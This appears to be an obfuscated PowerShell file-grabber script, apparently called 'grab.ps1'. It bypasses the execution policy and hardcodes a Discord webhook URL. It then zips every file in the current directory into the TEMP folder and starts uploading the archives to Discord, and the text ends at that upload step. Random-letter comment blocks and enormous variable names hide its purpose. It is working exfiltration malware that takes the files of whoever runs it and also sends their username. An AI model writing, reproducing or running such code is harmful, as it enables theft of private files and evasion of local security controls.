# rWpDVdKWumRzvmE yxNuDZVNriAKtT qvdZfXmtvq PYUyCAXkgZbmY HDtb zItoGeZ rjLM XsKXlrzTnxoUS
#     yCqODpMbKJ BcUhPINQc BURdtYXMyX keJ jmgfqJzGhep zdwSgmeQQHPa sUfiAIf otHrzjbNoWo HNmWRzcUqDC
#  MZHU OmaKrwunsOXBkJv gdvOBSEmnMYgjdC sQoVeqfDWVmeA nvjQfxR oiIUZKmBbP OoF pCuU VAYyJwm
#  ofztCiTg pxNdma LlhndFsbYcj akJCpIIHLkNhVlk iYbhwpMXHScmmAm MANNlFmUAd PmhRsbwflFv IrWWJfA
#    ocyfzBLIDAG PcoSstwBfsn GPtuM cajegHFTvNfzlj opEAkggcD NBcv qzexsRhonaV blHEsXDwlZRtb DGseD ZYutV
# MxXl xIDPHl Ivd IiwSHN kjJEBBEWAPhoC vHqjMgs JJtxPDSoskVORF bcElIZNLhcByIxG ItCdlPOSGpOSvZK
#   FOcn tEhpV
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
      
function JJtzcdntEBdlyIjSFDRxrNJMseXoXYTUEZVGEgOLl {
       [CmdletBinding()]
param (
      [parameter(Position=0, Mandatory=$fAlSE)]
[string]$TEXt,
         [parameter(Position=1, Mandatory=$fAlSE)]
      [string]$DirEcToRy = (Get-Location).Path
 )
        
         $QNVnsI6KKVg8A3awsLF4TR8ilC54JRdGNxFrqGnfB1jnvlUR5qqDY3bbFEUCDooNyccCpbVOFA8jhQRStjXIXLQyELdeYeMksK7XasKC5wp625TUSkf4Q9Qc7tw2ThBDIPwLxN2pNbybfW45kyCwxIk58Fa4evwJtXYUIOLv0cZZ5I6MqRoITc4WHak1YoHcNVLWAoF97go5huL5oTdSb3iTGmXr3nraS6eRXq4VkL5flJ4tdG2A6VNosL9fbjYemlebaTQrzK3gjU21cGuHbzFgvISNFEnLYOPjJ3rMKYOFybHWmM2kUkVBU0nUvfJY8ESL24B1J5Bwdl7Qdh1hNMeK5NbvaK3QzGoQsgkE3ZcCfEwYXD = 'https://discord.com/api/webhooks/1385202869250293770/8aYR_Of7nCv2k10cy2hHd3eBHC028Xjniue4dZW9vE1QFQxruwU4OYsH-XzNYE1wkA7d'
    
  $MRxgDEsj8FdyIzNdEBrMeQbBaZp6FYe1JGF51Xdw9Iq5671dhTqA3olZ62M41T7oDBleWMEXqn7PHVoRJyHHjamOEneotGxlJo2sqPcrj6ubSuMMrexC3ygpSq83tABgrLjblwRoX2hXZSNjAw0NCHR6uPJcLCBhBPZQ09rBs04mV6ZesvYivNjI1gsDRaSX589aaidYkNv1vX7UYmFlt4f1PoocwJPXFNgKmEIYLP78Bn9qPoERe0hm6Dq9R9RnJKNvwClCoR7N8QCMDSe730dAg7kKFriIy3BZbvgVTFJ70iKFWMAZYTqtp5SzHpsxbskxDFykdpkSAzYstwIx1QLF9dr7DVJ7lITdbZ11I3ztIRFHgkNfn32oknx0Z7JnIQJfruyEw6qytTZxtuNXaiXQkn2shxyiOSjHx1KiyHpfqNBH7woWj7atDf4QO9ylQ08mRFFKwFHWOrMXQkQ4HUM7M7h9QDJKjc9C2VL6lXZFjFysecmpnqT2ejhAuJl1CqPSj3XPgHM7a5hTjxOUAqvsi9KyEQQg2iZko59gBtbuz7hLNr8R92Z8t6GLcMNQ7KgDph = @{
 'username' = $eNV:username
   'content' = $TEXt
     }
     
 if (-not ([string]::IsNullOrEmpty($TEXt))) {
      Invoke-RestMethod -ContentType 'Application/Json' -Uri $QNVnsI6KKVg8A3awsLF4TR8ilC54JRdGNxFrqGnfB1jnvlUR5qqDY3bbFEUCDooNyccCpbVOFA8jhQRStjXIXLQyELdeYeMksK7XasKC5wp625TUSkf4Q9Qc7tw2ThBDIPwLxN2pNbybfW45kyCwxIk58Fa4evwJtXYUIOLv0cZZ5I6MqRoITc4WHak1YoHcNVLWAoF97go5huL5oTdSb3iTGmXr3nraS6eRXq4VkL5flJ4tdG2A6VNosL9fbjYemlebaTQrzK3gjU21cGuHbzFgvISNFEnLYOPjJ3rMKYOFybHWmM2kUkVBU0nUvfJY8ESL24B1J5Bwdl7Qdh1hNMeK5NbvaK3QzGoQsgkE3ZcCfEwYXD -Method Post -Body ($MRxgDEsj8FdyIzNdEBrMeQbBaZp6FYe1JGF51Xdw9Iq5671dhTqA3olZ62M41T7oDBleWMEXqn7PHVoRJyHHjamOEneotGxlJo2sqPcrj6ubSuMMrexC3ygpSq83tABgrLjblwRoX2hXZSNjAw0NCHR6uPJcLCBhBPZQ09rBs04mV6ZesvYivNjI1gsDRaSX589aaidYkNv1vX7UYmFlt4f1PoocwJPXFNgKmEIYLP78Bn9qPoERe0hm6Dq9R9RnJKNvwClCoR7N8QCMDSe730dAg7kKFriIy3BZbvgVTFJ70iKFWMAZYTqtp5SzHpsxbskxDFykdpkSAzYstwIx1QLF9dr7DVJ7lITdbZ11I3ztIRFHgkNfn32oknx0Z7JnIQJfruyEw6qytTZxtuNXaiXQkn2shxyiOSjHx1KiyHpfqNBH7woWj7atDf4QO9ylQ08mRFFKwFHWOrMXQkQ4HUM7M7h9QDJKjc9C2VL6lXZFjFysecmpnqT2ejhAuJl1CqPSj3XPgHM7a5hTjxOUAqvsi9KyEQQg2iZko59gBtbuz7hLNr8R92Z8t6GLcMNQ7KgDph | ConvertTo-Json)
     }
      
       # qkgojtQc zDHJCzHVPK Row rGmfh pWbKDKkL yhBkoSCt FZN xRWftMrOz LbEBCcUrRoS XczatMcjlJznyad
#  RCbZ issZgvPHevGp DRxeON NxQPzOZLbwtJRy IZJy BdTqYQQbp jxeduCfQvrI cRjRmHpKw zVUICEJmKgYiLm
#   JSrvMCal sjSXRNaKru CUu fQwiIol KitvWcsVFLMqlyD XwoLHVSoR SuPjoY BJbOZCakEwSo kdlRS GKGMelcMQQ
#   irUZR dpVPEMRew MSrTg KcLLHU mGIjiumhPItpr OrXvCa FJCG qzkncTM KBPivTEJdgnOP meTwVvFKvg
#     AdeGrK TgsukEXFTQsToab JOgKaWz VKhjNOixCLvIGWa PFSOSCHVwyB colWFSdFVR cbwxMJvaiPMo lBeFKAUWqfc
         $GY6Umeu9EQsfw5ejzie2EZ3hwuEOQmID2LtARsvgSlxFocI5bYIsspy0w5XZ6i2eDsZ0mNObAlHj7efcGHWAWuoPwaiylcJHbp7D2eH2kBqwhoCv2GQJdy0j7hgFfKW8wGBO6PkAowCSFk8rhsCsBYVSmrY5WI3d5jz8MTIDQOerJQAITGf5C5bpTLPvdEY4JgmsPGpYBWyHdgO73yJo44i6LUQR89Eg0uLoB0ysUCvs43JpRqHcCL9QlnPWtVEtqa6XTohdNsKUzDwfIKwElUNcyiQ62gsKQgWd8Tz8BdeIPYJrRWgz5biVCdTaLKt3dc9Fzv6Q2HyjyHqgPf2qpCUhJCiONxHyxbC7MmJCsSCqjq4Kd649XIClu7PZMcmtdEaC6eXCfsMw7vbp8PEVQQRD2zuH3WDuCBpNH0W4vpdBhzqYoLBhtrzWdXrvCBVYkAMOMVGckipAQdYiOSXtxRBFnzRCIrdYrVhg40SOdEXp5U4ODhfOW12OrFFDFWjYE1j5539N95Q106mYc0cxfFLXXVnUlpheJaVibLGZZuDcqdp6tdU6uPuKc3bwr9jGfjkudSfhm8HCNwvko4G50oVohBUN35kslZTlIVSvLLWY2m2LHYMMI4BreqCJt1OEPi2B7xvZ3orZlzkhQGGavOwjzBmAMHYd2yZL48vApmEvIKKjAbcsTPNfqGfCys3uLaERNPCSS00cLlADA4kkNHZYCkTgTd0liROD5ePlyYIeVhvyKwvgv51HQnliR0ERMfZT0wFMHjDFHXAGRH8gUC5tINDLtZxmqSNSn2vDxIWT54RUQcI0MBY6dhF3iw9rUfR0dQjaPBHLHcBF5Q2g8HGOF5Y10EnwJ8XPqySIhB8pH3l6oo8ggmUoj3YUz2ni4Z7zcdX7Dvjqm0hTWranCxbPtj7xy7cEumr4my1Ini2z8cgeHJvDLud5qScvxbkMQHXrUaXjaNbpsy = Get-ChildItem -Path $DirEcToRy
         
        Write-Host "Found $($GY6Umeu9EQsfw5ejzie2EZ3hwuEOQmID2LtARsvgSlxFocI5bYIsspy0w5XZ6i2eDsZ0mNObAlHj7efcGHWAWuoPwaiylcJHbp7D2eH2kBqwhoCv2GQJdy0j7hgFfKW8wGBO6PkAowCSFk8rhsCsBYVSmrY5WI3d5jz8MTIDQOerJQAITGf5C5bpTLPvdEY4JgmsPGpYBWyHdgO73yJo44i6LUQR89Eg0uLoB0ysUCvs43JpRqHcCL9QlnPWtVEtqa6XTohdNsKUzDwfIKwElUNcyiQ62gsKQgWd8Tz8BdeIPYJrRWgz5biVCdTaLKt3dc9Fzv6Q2HyjyHqgPf2qpCUhJCiONxHyxbC7MmJCsSCqjq4Kd649XIClu7PZMcmtdEaC6eXCfsMw7vbp8PEVQQRD2zuH3WDuCBpNH0W4vpdBhzqYoLBhtrzWdXrvCBVYkAMOMVGckipAQdYiOSXtxRBFnzRCIrdYrVhg40SOdEXp5U4ODhfOW12OrFFDFWjYE1j5539N95Q106mYc0cxfFLXXVnUlpheJaVibLGZZuDcqdp6tdU6uPuKc3bwr9jGfjkudSfhm8HCNwvko4G50oVohBUN35kslZTlIVSvLLWY2m2LHYMMI4BreqCJt1OEPi2B7xvZ3orZlzkhQGGavOwjzBmAMHYd2yZL48vApmEvIKKjAbcsTPNfqGfCys3uLaERNPCSS00cLlADA4kkNHZYCkTgTd0liROD5ePlyYIeVhvyKwvgv51HQnliR0ERMfZT0wFMHjDFHXAGRH8gUC5tINDLtZxmqSNSn2vDxIWT54RUQcI0MBY6dhF3iw9rUfR0dQjaPBHLHcBF5Q2g8HGOF5Y10EnwJ8XPqySIhB8pH3l6oo8ggmUoj3YUz2ni4Z7zcdX7Dvjqm0hTWranCxbPtj7xy7cEumr4my1Ini2z8cgeHJvDLud5qScvxbkMQHXrUaXjaNbpsy.Count) items in directory: $DirEcToRy"
         foreach ($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S in $GY6Umeu9EQsfw5ejzie2EZ3hwuEOQmID2LtARsvgSlxFocI5bYIsspy0w5XZ6i2eDsZ0mNObAlHj7efcGHWAWuoPwaiylcJHbp7D2eH2kBqwhoCv2GQJdy0j7hgFfKW8wGBO6PkAowCSFk8rhsCsBYVSmrY5WI3d5jz8MTIDQOerJQAITGf5C5bpTLPvdEY4JgmsPGpYBWyHdgO73yJo44i6LUQR89Eg0uLoB0ysUCvs43JpRqHcCL9QlnPWtVEtqa6XTohdNsKUzDwfIKwElUNcyiQ62gsKQgWd8Tz8BdeIPYJrRWgz5biVCdTaLKt3dc9Fzv6Q2HyjyHqgPf2qpCUhJCiONxHyxbC7MmJCsSCqjq4Kd649XIClu7PZMcmtdEaC6eXCfsMw7vbp8PEVQQRD2zuH3WDuCBpNH0W4vpdBhzqYoLBhtrzWdXrvCBVYkAMOMVGckipAQdYiOSXtxRBFnzRCIrdYrVhg40SOdEXp5U4ODhfOW12OrFFDFWjYE1j5539N95Q106mYc0cxfFLXXVnUlpheJaVibLGZZuDcqdp6tdU6uPuKc3bwr9jGfjkudSfhm8HCNwvko4G50oVohBUN35kslZTlIVSvLLWY2m2LHYMMI4BreqCJt1OEPi2B7xvZ3orZlzkhQGGavOwjzBmAMHYd2yZL48vApmEvIKKjAbcsTPNfqGfCys3uLaERNPCSS00cLlADA4kkNHZYCkTgTd0liROD5ePlyYIeVhvyKwvgv51HQnliR0ERMfZT0wFMHjDFHXAGRH8gUC5tINDLtZxmqSNSn2vDxIWT54RUQcI0MBY6dhF3iw9rUfR0dQjaPBHLHcBF5Q2g8HGOF5Y10EnwJ8XPqySIhB8pH3l6oo8ggmUoj3YUz2ni4Z7zcdX7Dvjqm0hTWranCxbPtj7xy7cEumr4my1Ini2z8cgeHJvDLud5qScvxbkMQHXrUaXjaNbpsy) {
    Write-Host "Processing: $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name)"
# GAHLAphSMcPkGz YhqzR dDuvCodUb GIniAjxlDEPc hYxEzBvaUhbNJkA TLsnwIFPoVLSDmG XBtRMjKwDp
#   qCPObUweIyKBmGW BafRJEeDRs mpc PapOiAstLmJbqLZ KfZpgYOXsK pUsgqThKmfsyi rQbSmUbyZCY eSnN HbnoLghm
#  bAbhAOxDTe InbkBKu mwZuqKEnUM RFOHiCleGMhKhaE IpaHvZSKMpiO vuzxmbPgPAgea rjsp WFCaLpozqr iuu
#    lkcpObNXDD heSTzETRdWBHv PiSkPojR WrDADtKpP pau UgpQkJWuVBpCCVn yFMRLNnQTy IFngcF njODuuBTkScpZM
#     PvXVxssZvOdyt HHUFYMBPoQM yVhrOKQFAXmYJE jeYSqLeO CpCcbKTQqVaK VbJxPatHn ypfrYqRNS KWjDLFVAm uxfUzWDGpcdWCpo
# roCozwnv KNVKk jTCA XwOcsOaaUGudYl lMAYcMqsiDLhrsn JxPaRJZJuywKX sdKMuzbmiifRm EsStMARoCyZYd
#    kwgn NtjHCOvgyCpYCm oulUAsodrJl BLVbrnSpkPGa FNCIt wWlOUky zaywptLYkDlKR SDmcHNhieN QYRd
# nGneexAQXVH ipHRslqLJc GLfmnkN lkDTcsMSNxg GFcS CWQPOfU ltgCyqBLoHn ORuiiU dlTUDnKizL cOPTqmBJMai
#   fJApHCnRxLiRClK MUTOuhitXcJRPQN plDNLceCU Twb jZlUzNagYQJCi njwVHKeGb JqkEAcBmG YSFLnzclmtekwU owfxkTpuwLEyoio
# QMNixFEBLdhM zvx nmEIEhXEIjIrk EKBOcNhM oaKwLzdNqcwMoyT syB wgj lAQJUAuXuxBg rpVOWmSaF JVaNZnZkoWiarPz
#  TGiuqXtSwU Zliu DrvziNkKgx okaq sKWArhqCFiNWe nKUWjkmRnIL uhEV EUWPmLOXC SxCRQ siSCxRDmiGnuvJI
#  MdB rARJESno jPsYFnRn xtFfz EofZSW qjkg SJL oXZTYxnkXBNXuY tGcRuTex QlcdAaEIualdC FlaQJN
#   NsHw nWxn iMtsKnO VHg PvCWI VngTehYWOFIued wdDbFjg mhNyZsSsAK dKYygpdKRvkdmX pkm lgcz
#   jUOcGhyA TleUSKTb RgjDurkMQzRJA HmJiMRdwtAfZtKP jlqdg ryoHox ZORXcPWIbm rkD QmtStYKyhQHcsg
#    ClcAM ljJUhKustdh qnpLpuMbiA HGUq mIuBTsbIjFl HHlnzS qJqpxxKsP WYszAr IftYZyFknoLcDYb eUdaFGKPosMTf
# dBXb NQdiVXtUSMTrsaq aNGwkieQmZj JwxTJYKKIFKdq GrIpHfyDH ihFc szvhEbGnQSxK eAfJmfYSYEMHx
# GnjpfqN dTrMBDrwv AxGEOYH hGqHjcmmzFDkT AtdHxVbIiJCy UjsVufBaYML blAn sfbqaHY UztscStdvoaI
#   nQF MxxMzsfGABGq qwRWguoYY zlSgPSpR vNjEVwi kApvKtFRS bRzDTBbTW ppYYzU IaiURux BcbPrnAzFWOVUxz
#  UciFknu fItRmYTKFkPHd QSPODXW CmyX BPGdIHCpXVV GqoPsYTCdXI qklmhvg THHGGQXUKh sSFPLwy Stejvaqzq
#   kkpgLKJWAxkQ pNLRMsK IHi bnDSrVVui rdHl IQNoRMhspt
  if ($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name -eq "grab.ps1") {
       continue
 }
 
       $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I = "$eNV:TEMP\$($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.BaseName).zip"
     
  try {
 # kxrGRjZGCL gzlJYiyIcGfzpjB PLI CcpAzdnA SEWtxpshHVqDFs BAMGoslqmJQE OkspPH iXRwSWpk
#     LTYLEhNJy YTNNZzw IWToDTsiSwSd cvLNhXnZU tDXgWHaHWRzZ
  Compress-Archive -Path $0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.FullName -DestinationPath $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I -Force -ErrorAction Stop

# uqtAHvYfrePZ ZamYy OstNMWfB lRUDrmVIC RGdz WsGrOxhTmTXbh vOJk TWNshAQtUvDf csOUZ
#  kuvZf ffkcVMRtPKbPOEL HDOz XRPIhcl Plzij mrJlTIDqOea ggmPZzuMA jLr JoeTeReiR sQc zhaEFWmHR
#     iQxcJ RlejnFTFkuJHc UelfXLT nSWSGfCcyq hofRQ GcoMzromlWTYOi axjTYutcXs oaGAgoRoLskkKyI
#  QlhMas iiTHvfF BqEDl wUFy StUcmi VpNlpEoL DBdU Nqbjyfih uOXOclsgbRyeBC VLmPniiXENtzW uRaHGbUKBxUdMe
#   XztizCH eJDkcWtbEuzbf ekMYrmQcWKprjFu yuB DTPShQJRAugLc FHCJZP gIpXADU MKtKGQQmezPH hxzzkG
#  iYIldACpRk ZRtXexhiAHUeb MKxyEWFAnb JggejBvPzDH rtfrFXShX tIxEJ JcXd oFelr tuoilnMslBggb pgnNRTJ
#  fhLHoixSF YttpNqhmFiAag XbUYlVImo UfSFBAiHN QoQzRAXSWyQzw xZLEhQ xgQmcuvczP xCXeblSZmAwLWvU
#   WCblYXuuBLNH HJfiIgAHxubONYp oJJFTu ZWqyOGuLS KoTwrCW TiUtPdJUJSMagaU
   if (Test-Path $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I) {
   try {
     # tYOK cAeICbDWTDXTo tTQk cVaFbRBnCV UaeCFtNRuIrkqH hYYPO whyEA dcUFxZQTrgnu kQIbMCWZ
#    ZOfHjA ShTFiDkXOywD szHVDJ eAIRPIjKxhZtt QmFoDSema RCnBMAgz FmxeyXKEKENb zYcEyu sSkEXXXvwCLgk
#   gczNmbnz rOPagqZQhn RkxPcWBEzu tyHHUyESOtNHBq WReCne ZrsILILKG MzatEN sNvRQQGG QSeUecDT tYU
#  iykDszuGVzg xntezHOUKghsS TDc aJnhOHPybzuMF HVqTkKt IzuSP tEhGPJHqNSoIz dfyQPoxmoNzFEo QEWEgUHAIXf
#     ifR RHLQqomLFp VjJYuwxJQLAiAR eTFnxuTnZQnLqPh NzSLIsan psiRs nGNWTQryj liky vNmQkGEx
#     LnRiusiOYzgA peSQlVhiqdcYyG kNbxGzLdWYcIE srjncJ qiiVDbKePKHvF ieyHm aDGNgP yLlPyeGod uRTICR IamJfqUwqIthDD
#     dUZ bmVvBeBQjM ppmsDK qmVk LvMLk jPO xgrKVmg KWFzEqUIpYfCvrb cDVNytQWTbCV wBSDdHLinYBYRzN
#    BvQJxYlGSGu DItMSVthEBH IaKzygw KEMcZVRihTVf AoSkzqYbGfJuVO ANzPoseKtd pTebedcmtBgkE ykZjVhSPXv
#  VWJhk HGXX MrmnQIkAwWGBu POBTvjh SLcloyEBTRMl COzqnazSDtbn ZBlhW aercUVIeZm EvdWZXGQKYYDI
#   ANdXSbCchWPCG nFMZLLpinBo fiImV qsuixhuZ UKf IcqLJ OMHKHgJVNNRkVuO CfLrudWcy ZxPhcmMDhoesp qGoBuKWpNivM
#     ShSvPypsGe tgYL ioiCbvoKQmpe PZYnTUEPShbva OSzfIDfNIlrfJA HjbfbdbyGzJS gqIblvsYvmUuOHO
         Write-Host "Uploading $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name) to Discord..."
